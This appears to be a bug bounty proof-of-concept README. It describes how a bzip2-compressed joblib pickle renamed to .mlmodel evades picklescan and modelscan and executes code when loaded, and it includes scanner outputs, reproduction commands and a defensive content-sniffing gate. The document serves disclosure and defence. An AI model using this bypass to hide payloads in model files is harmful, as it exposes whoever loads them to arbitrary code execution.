CoreML .mlmodel MFV PoC: Authorized Security Research
This repository contains a proof-of-concept for an authorized bug bounty submission.
Authorization Statement
This is authorized security research conducted under the huntr.com / Protect AI Model File Vulnerability (MFV) bug bounty program. Protect AI publicly invites researchers to find vulnerabilities in ML security tooling. All proof-of-concept work runs locally. This is responsible disclosure: findings are reported to vendors for remediation.
Vulnerability Summary
- Format: Apple CoreML .mlmodel
- Scanner Bypass: picklescan 1.0.4 + modelscan 0.8.8 (dual bypass, all 4 scan modes)
- Impact: Arbitrary code execution when the malicious .mlmodel file is loaded
- Technique: bzip2-compressed joblib payload; the bzip2 header BZh9 crashes picklescan's pickle parser before any dangerous globals are detected
How It Works
- The .mlmodel extension is absent from picklescan's and modelscan's extension lists
- A bzip2-compressed joblib file is renamed to .mlmodel
- Both scanners report clean (all modes: direct scan + directory scan)
- joblib.load() transparently decompresses and deserializes the file; the payload executes
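A content-sniffing pre-check for the gap described above, added here as an example and not part of the PoC or of either scanner: it ignores the file extension, classifies the bytes, and flags a bzip2 or gzip stream that wraps a pickle before anything calls joblib.load(). The protobuf tag-byte heuristic and every sample input are assumptions constructed for this example.

```python
import bz2
import gzip
import pickle
import zlib

PREFIX_BYTES = 64  # a small decompressed prefix is enough to sniff for a pickle


def _looks_like_pickle(prefix: bytes) -> bool:
    # Protocol 2..5 pickles begin with the PROTO opcode (0x80) and the protocol number.
    return len(prefix) >= 2 and prefix[0] == 0x80 and 2 <= prefix[1] <= 5


def classify_model_bytes(data: bytes) -> str:
    """Classify bytes that arrive under a .mlmodel name, ignoring the extension:
    'protobuf', 'pickle', 'unknown', or '<bz2|gzip>[-pickle|-corrupt]'."""
    if len(data) < 2:
        return "unknown"
    try:
        if data[:3] == b"BZh" and data[3:4].isdigit():  # bzip2 stream, e.g. BZh9
            kind = "bz2"
            prefix = bz2.BZ2Decompressor().decompress(data, PREFIX_BYTES)
        elif data[:2] == b"\x1f\x8b":  # gzip stream
            kind = "gzip"
            prefix = zlib.decompressobj(16 + zlib.MAX_WBITS).decompress(data, PREFIX_BYTES)
        elif _looks_like_pickle(data):
            return "pickle"
        elif data[0] == 0x08:
            # Assumption (heuristic): a serialized CoreML Model protobuf starts with
            # field 1 (specificationVersion, varint), whose tag byte is 0x08.
            return "protobuf"
        else:
            return "unknown"
    except (OSError, EOFError, zlib.error):
        return f"{kind}-corrupt"
    return f"{kind}-pickle" if _looks_like_pickle(prefix) else kind


def admit_mlmodel(data: bytes) -> bool:
    """Loader gate: only a protobuf-looking body is allowed to reach a deserializer."""
    return classify_model_bytes(data) == "protobuf"


# Constructed samples (not the repository's files): a harmless pickle wrapped the way a
# joblib compress=('bz2', 9) dump is, the same pickle under gzip, and a protobuf-like header.
SAMPLE_PICKLE = pickle.dumps({"weights": [0.1, 0.2]}, protocol=4)
SAMPLE_BZ2_PICKLE = bz2.compress(SAMPLE_PICKLE, 9)
SAMPLE_GZIP_PICKLE = gzip.compress(SAMPLE_PICKLE)
SAMPLE_PROTOBUF_LIKE = b"\x08\x05\x12\x00"
```

Run the gate on the bytes of any incoming .mlmodel before it reaches a loader; a result other than "protobuf" should quarantine the file for review rather than load it.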
Scanner Results
picklescan 1.0.4 -p malicious_model_final.mlmodel → Infected: 0, Dangerous globals: 0
picklescan 1.0.4 -p ./ → Scanned: 0
modelscan 0.8.8 -p malicious_model_final.mlmodel → No issues found!
modelscan 0.8.8 -p ./ → No issues found!
Files
- malicious_model_final.mlmodel: bzip2-compressed joblib payload with .mlmodel extension
- poc-mlmodel.py: reproduction script
Reproduction
pip install joblib picklescan modelscan
python3 poc-mlmodel.py
picklescan -p malicious_model_final.mlmodel
modelscan -p malicious_model_final.mlmodel
python3 -c "import joblib; print('BEFORE'); joblib.load('malicious_model_final.mlmodel'); print('AFTER')"